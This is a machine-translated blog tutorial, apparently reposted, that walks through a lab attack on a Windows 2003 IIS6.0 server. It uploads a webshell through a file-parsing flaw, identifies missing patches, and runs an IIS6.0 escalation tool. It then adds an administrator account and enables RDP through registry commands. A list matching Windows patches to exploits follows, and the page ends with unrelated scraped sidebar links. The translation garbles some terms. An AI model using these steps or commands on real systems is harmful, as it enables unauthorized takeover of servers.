当前位置:网站首页>108. Network security penetration test - [privilege escalation 6] - [windows kernel overflow privilege escalation]
108. Network security penetration test - [privilege escalation 6] - [windows kernel overflow privilege escalation]
2022-07-07 11:56:00 【qwsn】
In my submission , Whether studying safety or engaging in safety , More or less, I have some feelings and sense of mission !!!
List of articles
One 、Windows IIS6.0 Spillover claims
1、Windos Introduction to power raising :
window Servers often use win2003、win2008 and win2012. In the penetration test , The permission we obtained is iis_user User group , To get higher permissions, you need to raise the current user to the system user or super administrator user group . Higher permissions facilitate our subsequent penetration , Extended range test .
2、 Comparison of program permissions :
stay iis Inside , The size of permissions in turn :aspx>php>=asp
,aspx By default, it can execute terminal commands 、php and asp If the command cannot be executed , stay wscript.shell If the component is not deleted , Can be uploaded cmd To the executable directory to execute terminal commands .
3、 Exploit process :
(1) Experimental environment :
1. Target environment :
(1) virtual machine Windows2003【upload.moonteam.com】【192.168.97.132】
(2) Scripting language environment :php/asp/aspx Language environment exists
2. attack :
(1) virtual machine Win7【192.168.97.130】
(2)Firefox+Burpsuite+ Ant sword + Malaysia
3. The network environment :
(1)VMware Built NAT The Internet
(2) Target link :
URL:http://upload.moonteam.com/upload_6.php
(3) Experimental process :
First step : Visit the target link , After a series of tests , It turns out that this is IIS6.0 File parsing vulnerability , Therefore, you can upload Damascus through vulnerability characteristics .
The second step : Upload Malaysia
The third step : Visit Malaysia http://upload.moonteam.com/upfile/heroes.asp;.jpg
# The password of Malaysia is heroes
Step four : Click on [ Service information Component support ] modular , View the command execution component wscript.shell Whether the component is deleted
Step five : Click on [RECYCLER] modular , To view the recycle bin directory .
Step six : Click on [ Upload file module ], To upload cmd.exe Go to the recycle bin directory .
Step seven : Click on [CMD perform ] modular , Then fill in SHELL Path and command to execute , Finally check WScriptShell Component and click to execute , Thus test cmd.exe Of whoami command .
Step eight : Click on [CMD perform ] modular , Carry out orders systeminfo
, Save the results to the local systeminfo.txt.
Step nine : Using scripts wes.py, perform python wes.py systeminfo.txt > res.csv
command , Get out of the hole , Save to res.csv
Step 10 : analysis res.csv, Search vulnerability , Find out CVE-2009-1535 Of IIS6.0 There are loopholes in rights raising
Step 11 : Click on [ Upload file module ], To upload IIS6.0.exe Go to the recycle bin directory , But the upload failed , Here we go to upload a Damascus dedicated to uploading files , Then upload IIS6.0.exe
The twelfth step : Visit Malaysia ,http://upload.moonteam.com/upfile/up.aspx
# password admin, Upload IIS6.0.exe Lift the right tool to the recycle bin directory
Thirteenth Step : Back to the beginning of Malaysia , Get into [CMD perform ] modular , type C:\RECYCLER\IIS6.0.exe "whoami"
# Pay attention to the format of executing the command
The fourteenth step : Enter the following commands in turn , To create users demo1, Join the administrators group , Turn on 3389 port , Connect the target remotely .C:\RECYCLER\IIS6.0.exe "net user demo1 123 /add"
# Add users
C:\RECYCLER\IIS6.0.exe "net localgroup administrators demo1 /add"
# Join the administrators group C:\RECYCLER\IIS6.0.exe "net user"
# View created users
C:\RECYCLER\IIS6.0.exe "netstat -ano"
# Look at the open ports
C:\RECYCLER\IIS6.0.exe "REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal\" \"Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f"
# Turn on 3389C:\RECYCLER\IIS6.0.exe "netstat -ano"
# Look at the open ports
The last step : type win+r, Input mstsc, Fill in the target ip, The account just created , So as to achieve the purpose of remote login .
attach 1: Some system vulnerabilities correspond to patch numbers
Win2003
KB2360937|MS10-084
KB2478960|MS11-014
KB2507938|MS11-056
KB2566454|MS11-062
KB2646524|MS12-003
KB2645640|MS12-009
KB2641653|MS12-018
KB944653|MS07-067
KB952004|MS09-012 PR
KB971657|MS09-041
KB2620712|MS11-097
KB2393802|MS11-011
KB942831|MS08-005
KB2503665|MS11-046
KB2592799|MS11-080
KB956572|MS09-012 barbecue
KB2621440|MS12-020
KB977165|MS10-015Ms Viru
KB3139914|MS16-032
KB3124280|MS16-016
KB3134228|MS16-014
KB3079904|MS15-097
KB3077657|MS15-077
KB3045171|MS15-051
KB3000061|MS14-058
KB2829361|MS13-046
KB2850851|MS13-053EPATHOBJ 0day limit 32 position
KB2707511|MS12-042 sysret -pid
KB2124261|KB2271195 MS10-065 IIS7
KB970483|MS09-020IIS6
Win2008
KB3139914|MS16-032
KB3124280|MS16-016
KB3134228|MS16-014
KB3079904|MS15-097
KB3077657|MS15-077
KB3045171|MS15-051
KB3000061|MS14-058
KB2829361|MS13-046
KB2850851|MS13-053EPATHOBJ 0day limit 32 position
KB2707511|MS12-042 sysret -pid
KB2124261|KB2271195 MS10-065 IIS7
KB970483|MS09-020IIS6
Win2012
KB3139914|MS16-032
KB3124280|MS16-016
KB3134228|MS16-014
KB3079904|MS15-097
KB3077657|MS15-077
KB3045171|MS15-051
KB3000061|MS14-058
KB2829361|MS13-046
KB2850851|MS13-053EPATHOBJ 0day limit 32 position
KB2707511|MS12-042 sysret -pid
KB2124261|KB2271195 MS10-065 IIS7
KB970483|MS09-020IIS6
attach 2:aspx Authority is higher than asp An example of
边栏推荐
- R language uses the quantile function to calculate the quantile of the score value (20%, 40%, 60%, 80%), uses the logical operator to encode the corresponding quantile interval (quantile) into the cla
- 软件内部的定时炸弹:0-Day Log4Shell只是冰山一角
- 浙江大学周亚金:“又破又立”的顶尖安全学者,好奇心驱动的行动派
- 【问道】编译原理
- Use references
- [Yugong series] go teaching course 005 variables in July 2022
- Half of the people don't know the difference between for and foreach???
- 竟然有一半的人不知道 for 与 foreach 的区别???
- 【神经网络】卷积神经网络CNN【含Matlab源码 1932期】
- 相机标定(1): 单目相机标定及张正友标定基本原理
猜你喜欢
【最短路】ACwing 1127. 香甜的黄油(堆优化的dijsktra或spfa)
In SQL, I want to set foreign keys. Why is this problem
Fleet tutorial 19 introduction to verticaldivider separator component Foundation (tutorial includes source code)
[full stack plan - programming language C] basic introductory knowledge
NPC Jincang was invited to participate in the "aerospace 706" I have an appointment with aerospace computer "national Partner Conference
5V串口接3.3V单片机串口怎么搞?
Test the foundation of development, and teach you to prepare for a fully functional web platform environment
人大金仓受邀参加《航天七〇六“我与航天电脑有约”全国合作伙伴大会》
SwiftUI 教程之如何在 2 秒内实现自动滚动功能
Flet教程之 14 ListTile 基础入门(教程含源码)
随机推荐
How to write test cases for test coupons?
UP Meta—Web3.0世界创新型元宇宙金融协议
Some opinions and code implementation of Siou loss: more powerful learning for bounding box regression zhora gevorgyan
聊聊SOC启动(七) uboot启动流程三
软件内部的定时炸弹:0-Day Log4Shell只是冰山一角
问下flinkcdc2.2.0的版本,支持并发,这个并发是指多并行度吗,现在发现,mysqlcdc全
[extraction des caractéristiques de texture] extraction des caractéristiques de texture de l'image LBP basée sur le mode binaire local de Matlab [y compris le code source de Matlab 1931]
【最短路】ACwing 1127. 香甜的黄油(堆优化的dijsktra或spfa)
[question] Compilation Principle
sink 消费 到 MySQL, 数据库表里面已经设置了 自增主键, flink 里面,如何 操作?
Network protocol concept
CMU15445 (Fall 2019) 之 Project#2 - Hash Table 详解
Test the foundation of development, and teach you to prepare for a fully functional web platform environment
Fleet tutorial 19 introduction to verticaldivider separator component Foundation (tutorial includes source code)
聊聊SOC启动(十) 内核启动先导知识
108.网络安全渗透测试—[权限提升篇6]—[Windows内核溢出提权]
正在運行的Kubernetes集群想要調整Pod的網段地址
STM32入门开发 采用IIC硬件时序读写AT24C08(EEPROM)
R language Visual facet chart, hypothesis test, multivariable grouping t-test, visual multivariable grouping faceting boxplot, and add significance levels and jitter points
Camera calibration (2): summary of monocular camera calibration